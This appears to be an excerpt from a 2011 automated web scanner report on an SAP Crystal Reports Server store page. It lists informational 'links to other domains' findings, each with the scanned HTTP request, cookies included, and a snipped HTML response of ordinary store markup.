Date: Sat, 15 Oct 2011 14:31:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>


<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=68c0c513&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&categoryID=57066300&ceid=176519300&cename=TopHeader
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
</a> <img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span class="last">
...[SNIP]...
<a href="#" onClick="javascript:window.print()" class="print"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/print_icon.gif" alt="Printer Friendly" /></a>
...[SNIP]...
<a href="javascript:openEmailThisPageForm();" class="email lbOn"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/emailIcon_r2_c2.jpg" alt="Email page" /></a>
...[SNIP]...
<div id="dr_thumbnailImage">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/bobjamer/images/product/detail/screenshots/SAP_Crystal_Reports_Server160x160.jpg" border="0" alt="Buy SAP Crystal Server upgrade, 5 named user licenses" />
</div>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a class="dr_ShareLink" href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=ra-4e3f99bf74164a4e" onClick="return false;" onMouseOver="return addthis_open(this, '', '[URL]', '[TITLE]');" onMouseOut="addthis_close();">Share</a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pubid=ra-4e3f99bf74164a4e"></script>
...[SNIP]...
<li class="dr_Like"><iframe src="http://www.facebook.com/plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2FStyleVersion.7%2Fceid.173834100%2Fcename.ProductDetails%2FcategoryID.57066300%2FparentCategoryID.57065700%2FproductID.231860100%2FEnv.BASE%2FStyleID.39233700%2FESIHC.68c0c513%2FCurrency.USD&amp;layout=button_count&amp;show_faces=false&amp;width=150&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;"></iframe>
...[SNIP]...
<div id="dr_details_column2_content" class="dr_content"> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7"><img style="border: 0px solid; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7 " title=" ">CRS Explore, Manage, and Share Critical Business Information</a>
...[SNIP]...
<br /> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E "><img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E " title=" ">Comparison of Features by Version</a>
...[SNIP]...
<a href="http://www.businessobjects.com/jump/xi/dev_roundup/forrester.pdf" target="_blank"> <img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a>
...[SNIP]...
<br /> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794 "><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794" title=" ">SAP Crystal Solutions What...s New in 2011</a><br /> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D"><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D" title=" ">SAP Crystal Solutions 2011 FAQ</a>
...[SNIP]...
<p>Visit our <a href="http://www.sap.com/solutions/sapbusinessobjects/sap-crystal-solutions/information-infrastructure/sapcrystalserver/licensing/index.epx" target="_blank">SAP Crystal Reports Server licensing terms</a>
...[SNIP]...
<p class="right-rail-link"><a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore" target="_new">Get a Trial ...</a>
...[SNIP]...
<p class="right-rail-link"><a href="http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx?xsite=CG4D9F644F" target="_blank">Find a Reseller ...</a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
                       <noscript><img src="https://roiengine.sap.com/p.pl?a=10002109824374&js=no" width="1" height="1"></noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.7. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; extcmp=null; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689060945; fcR=http%3A//www.sap.com/index.epx; mbox=check#true#1318689123|session#1318689062767-959486#1318690923|PC#1318689062767-959486.19#1319898665; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; s_pers=%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%255D%7C1476541862905%3B%20s_ttc%3D1318688493%7C1350225062924%3B%20c13%3Destores%253Aus%253Ahomepage%7C1318690868667%3B%20pe%3Dno%2520value%7C1318690868669%3B%20c3%3Dno%2520value%7C1318690868671%3B%20s_nr%3D1318689068677-New%7C1321281068677%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292668680%3B%20s_visit%3D1%7C1318690868682%3B%20gpv_p47%3D1%7C1318690868684%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20v13%3DCG4DA4BC51%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443; fcC=X=C2033968180&Y=1318689061488&FV=10&H=1318689060945&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0&E=1135861&F=0&I=1318689068696

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66142366287,0)
Date: Sat, 15 Oct 2011 14:30:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>


<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=68c0c513&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&_s_icmp=CG4E7A594&categoryID=57066300&ceid=17651930
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
</a> <img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span class="last">
...[SNIP]...
<a href="#" onClick="javascript:window.print()" class="print"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/print_icon.gif" alt="Printer Friendly" /></a>
...[SNIP]...
<a href="javascript:openEmailThisPageForm();" class="email lbOn"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/emailIcon_r2_c2.jpg" alt="Email page" /></a>
...[SNIP]...
<div id="dr_thumbnailImage">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/bobjamer/images/product/detail/screenshots/SAP_Crystal_Reports_Server160x160.jpg" border="0" alt="Buy SAP Crystal Server full product, 5 concurrent access licenses" />
</div>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a class="dr_ShareLink" href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=ra-4e3f99bf74164a4e" onClick="return false;" onMouseOver="return addthis_open(this, '', '[URL]', '[TITLE]');" onMouseOut="addthis_close();">Share</a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pubid=ra-4e3f99bf74164a4e"></script>
...[SNIP]...
<li class="dr_Like"><iframe src="http://www.facebook.com/plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2F_s_icmp.CG4E7A594%2FparentCategoryID.57065700%2FproductID.231860300%2FEnv.BASE%2FStyleID.39233700%2FESIHC.68c0c513%2FCurrency.USD&amp;layout=button_count&amp;show_faces=false&amp;width=150&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;"></iframe>
...[SNIP]...
<div id="dr_details_column2_content" class="dr_content"> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7"><img style="border: 0px solid; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7 " title=" ">CRS Explore, Manage, and Share Critical Business Information</a>
...[SNIP]...
<br /> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E "><img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E " title=" ">Comparison of Features by Version</a>
...[SNIP]...
<a href="http://www.businessobjects.com/jump/xi/dev_roundup/forrester.pdf" target="_blank"> <img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a>
...[SNIP]...
<br /> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794 "><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794" title=" ">SAP Crystal Solutions What...s New in 2011</a><br /> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D"><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D" title=" ">SAP Crystal Solutions 2011 FAQ</a>
...[SNIP]...
<p>Visit our <a href="http://www.sap.com/solutions/sapbusinessobjects/sap-crystal-solutions/information-infrastructure/sapcrystalserver/licensing/index.epx" target="_blank">SAP Crystal Reports Server licensing terms</a>
...[SNIP]...
<p class="right-rail-link"><a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore" target="_new">Get a Trial ...</a>
...[SNIP]...
<p class="right-rail-link"><a href="http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx?xsite=CG4D9F644F" target="_blank">Find a Reseller ...</a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
                       <noscript><img src="https://roiengine.sap.com/p.pl?a=10002109824374&js=no" width="1" height="1"></noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.8. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&parentCategoryID=57065700&categoryID=57066300&productID=231860100 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690909272%3B%20pe%3DprodView%252Cevent18%7C1318690909274%3B%20c3%3Dno%2520value%7C1318690909280%3B%20s_nr%3D1318689109286-New%7C1321281109286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292709289%3B%20s_visit%3D1%7C1318690909291%3B%20gpv_p47%3Dno%2520value%7C1318690909293%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689109320

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=237941432725,0)
Date: Sat, 15 Oct 2011 14:36:56 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>


<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=cf7c120c&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&categoryID=57066300&ceid=176519300&cename=TopHeader
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
